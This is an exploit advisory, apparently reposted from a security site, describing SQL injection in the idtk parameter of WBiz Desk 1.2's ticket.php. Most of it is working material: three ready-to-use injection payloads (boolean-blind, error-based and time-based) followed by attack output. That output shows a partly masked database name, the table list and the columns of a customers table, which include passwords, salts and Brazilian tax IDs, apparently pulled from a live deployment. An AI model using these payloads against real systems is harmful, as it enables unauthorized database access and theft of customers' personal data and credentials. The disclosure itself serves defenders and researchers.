WBiz Desk 1.2 SQL Injection

渗透技巧 1年前 (2023) admin
277 0 0

WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability in the idtk parameter. This is a variant finding from the original discovery of SQL injection in this version attributed to h4ck3r in May of 2023.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : https://www.codester.com/items/5641/                                       │
│  Vendor   : WeBiz Digital                                                              │
│  Software : WBiz Desk 1.2                                                              │
│  Vuln Type: SQL Injection                                                              │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│ Release Notes:                                                                         │
│ ═════════════                                                                          │
│                                                                                        │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and     │
│ damage to a company's reputation.                                                      │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
  CryptoJob (Twitter) twitter.com/0x0CryptoJob
     
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /ticket.php

http://website/ticket.php?tk=1&idtk=[SQLi]&action=close


GET parameter 'idtk' is vulnerable to SQL Injection

---
Parameter: idtk (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close
---


[+] Starting the Attack

fetching current database
current database: 'wbizdesk_*****_com_br'


fetching tables

[12 tables]
+----------------+
| accounts       |
| category       |
| chat           |
| config         |
| customers      |
| departments    |
| email_template |
| log_tb         |
| messages       |
| tickets        |
| tutorial       |
| users          |
+----------------+


fetching columns for table 'customers'

[19 columns]
+--------------+-------------------+
| Column       | Type              |
+--------------+-------------------+
| name         | varchar(160)      |
| number       | varchar(11)       |
| status       | enum('S','B','N') |
| address      | varchar(255)      |
| city         | varchar(160)      |
| company      | varchar(160)      |
| country      | varchar(60)       |
| cpf_cnpj     | varchar(60)       |
| email        | varchar(255)      |
| id           | int(11)           |
| ip           | varchar(90)       |
| neighborhood | varchar(160)      |
| obs          | text              |
| os           | varchar(160)      |
| pass         | varchar(160)      |
| phrase       | varchar(160)      |
| salt         | varchar(255)      |
| state        | varchar(160)      |
| zipcode      | varchar(60)       |
+--------------+-------------------+


[-] Done

 

原文始发于CraCkEr:WBiz Desk 1.2 SQL Injection

版权声明:admin 发表于 2023年5月27日 下午2:48。
转载请注明:WBiz Desk 1.2 SQL Injection | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...